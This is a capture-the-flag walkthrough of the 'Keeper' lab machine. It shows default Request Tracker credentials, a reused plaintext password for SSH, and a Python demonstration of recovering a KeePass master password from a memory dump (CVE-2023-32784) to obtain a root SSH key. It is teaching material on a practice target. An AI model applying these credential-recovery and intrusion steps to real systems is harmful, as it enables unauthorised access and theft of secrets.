- Target IP: 10.10.11.227
- Local IP: 10.10.14.68
0x01 Information Gathering
An nmap port scan shows that only two ports are open: 22 (SSH) and 80 (HTTP).
The page served on port 80 points to the domain tickets.keeper.htb, so add an entry for it to the hosts file so that the name resolves to the target IP.
Accessing http://tickets.keeper.htb/ then shows the login page of a ticketing system.
0x02 Vulnerability Exploitation
The page identifies the vendor as Best Practical Solutions, LLC (the company behind Request Tracker, RT). Searching for "Best Practical Solutions, LLC username password" leads to the official documentation, which lists the default credentials as root/password, as shown in the image above. Let's try them.
The login needs several attempts before it succeeds, but the default credentials work.
The user list contains two accounts.
The comment on the lnorgaard account reads "New user. Initial password set to Welcome2023!", so the initial password was left in plain text inside the ticketing system.
Let's log in with this account and look around.
There is a ticket about KeePass: the user reports a problem with the KeePass client and has attached a file to the ticket.
Let's download the attachment.
After trying for a while, I couldn't download it. Let's try logging in over SSH with lnorgaard/Welcome2023! instead, in case the same password was reused for the system account.
The login succeeds, and user.txt is in the home directory.
0x03 Privilege Escalation
The image above shows that, besides user.txt, the home directory holds three more files: KeePassDumpFull.dmp, RT30000.zip and passcodes.kdbx.
Log in over SFTP with the same credentials and download all three.
Contents of RT30000.zip:
Opening passcodes.kdbx in a KeePass client requires the database's master password, which we do not have yet.
When a .dmp file is provided like this, the password can usually be extracted from the memory dump. Let's try mimikatz first, but it fails: mimikatz expects an LSASS dump, whereas this is a dump of the KeePass.exe process.
After searching, I found that KeePass 2.x has a memory-disclosure vulnerability, CVE-2023-32784, that allows the master password to be recovered from a process memory dump.
Let's search GitHub for a PoC. The repository describes itself as:
Retrieve the master password of a keepass database <= 2.53.1
Running it against KeePassDumpFull.dmp gives the following output:
Possible password: ●Mdgr●d med fl●de
The first character can never be recovered with this technique (the bug leaks nothing for the first keystroke), and the other unresolved positions are where non-ASCII characters in the password did not print correctly.
A Google search for the partial string turns up the name of a Danish dessert, which fits every recovered character:
rødgrød med fløde
Let's try this as the master password to open the kdbx file.
The database opens, and it contains the root credentials: a password and a PuTTY private key for root.
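To make clear why the PoC prints what it prints, here is an added example (not code from this writeup nor from the PoC repository) that reproduces the recovery idea behind CVE-2023-32784 on a constructed, synthetic memory dump. The masked text box in vulnerable KeePass 2.x versions leaves, for every keystroke after the first, a .NET string consisting of n-1 bullet characters (U+25CF, bytes CF 25 in UTF-16LE) followed by the n-th typed character; the scanner below looks for exactly that pattern. The dump layout, filler bytes and the decoy entries are assumptions made for the demo, and the function names are hypothetical.

```python
# Added demo of the CVE-2023-32784 recovery technique on a constructed dump.
# KeePass 2.x before 2.54 builds the master password in a masked text box that
# leaves, for every keystroke after the first, a managed string of the form
# "●●●x" (n-1 bullets followed by the n-th typed character) in process memory.
# .NET strings are UTF-16LE, so the bullet U+25CF appears as the bytes CF 25.
import re
from collections import defaultdict

BULLET = "\u25cf"                            # the mask character drawn by KeePass
BULLET_BYTES = BULLET.encode("utf-16-le")    # b"\xcf\x25"
UNKNOWN = BULLET                             # printed for positions that cannot be resolved


def build_fake_dump(password, decoys=()):
    """Constructed stand-in for a KeePass.exe memory dump (not a real dump).

    For 0-based position i >= 1 the leftover string is BULLET*i + password[i].
    Position 0 leaves no bullet-prefixed string, which is why the first
    character is never recoverable. `decoys` are extra (position, char)
    leftovers imitating mistyped characters or another masked text box.
    """
    leftovers = [(i, password[i]) for i in range(1, len(password))]
    leftovers += list(decoys)
    chunks = [b"\x00" * 16]
    for pos, ch in leftovers:
        chunks.append((BULLET * pos + ch).encode("utf-16-le"))
        chunks.append(b"\x00" * 6)           # filler standing in for heap object headers
    chunks.append(b"RT30000.zip\x00")        # unrelated data a real dump also contains
    return b"".join(chunks)


# One or more UTF-16LE bullets followed by exactly one UTF-16 code unit (BMP only).
LEFTOVER_RE = re.compile(rb"((?:\xcf\x25)+)(..)", re.DOTALL)


def recover_candidates(dump):
    """Map 0-based password position -> set of candidate characters found in dump."""
    candidates = defaultdict(set)
    for m in LEFTOVER_RE.finditer(dump):
        pos = len(m.group(1)) // 2           # number of bullets == character index
        ch = m.group(2).decode("utf-16-le", errors="replace")
        if ch == BULLET or not ch.isprintable():
            continue                         # bullet-only junk or binary noise
        candidates[pos].add(ch)
    return dict(candidates)


def render(candidates):
    """Assemble the best guess: position 0 is always unknown,
    positions with several candidates list all of them in braces."""
    if not candidates:
        return ""
    out = [UNKNOWN]
    for pos in range(1, max(candidates) + 1):
        opts = sorted(candidates.get(pos, ()))
        if len(opts) == 1:
            out.append(opts[0])
        elif opts:
            out.append("{" + "|".join(opts) + "}")
        else:
            out.append(UNKNOWN)
    return "".join(out)


if __name__ == "__main__":
    dump = build_fake_dump("rødgrød med fløde", decoys=[(2, "x")])
    print(render(recover_candidates(dump)))  # ●ø{d|x}grød med fløde
```

Because the scan decodes each recovered code unit as UTF-16, the non-ASCII ø survives here; the garbled characters in the real PoC output above come from how that tool prints bytes outside ASCII, not from the dump. The decoy shows why a real dump often yields several candidates for one position (typos, backspaces, other masked fields), which is why the PoC output has to be read as a pattern and then completed by hand or, as above, by a web search.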
Save the key from the database as a text file, then convert it from PuTTY's PPK format into an OpenSSH private key with puttygen.
The puttygen tool is part of the PuTTY package, so PuTTY needs to be installed.
Install putty on Mac:
brew install putty
Then run the following command to write the key in OpenSSH format as keeper.pem (123.txt is the saved PPK file):
puttygen 123.txt -O private-openssh -o keeper.pem
Restrict the key file's permissions, otherwise ssh refuses to use it, then connect to the target as root:
chmod 600 keeper.pem
ssh root@10.10.11.227 -i keeper.pem
Successfully connected with root privileges, obtain root.txt.
0x04 Conclusion
- Unexpectedly, user.txt was obtained simply by logging in over SSH with a password reused from the ticketing system.
- Learned about the KeePass vulnerability (CVE-2023-32784) that lets the master password be recovered from a memory dump.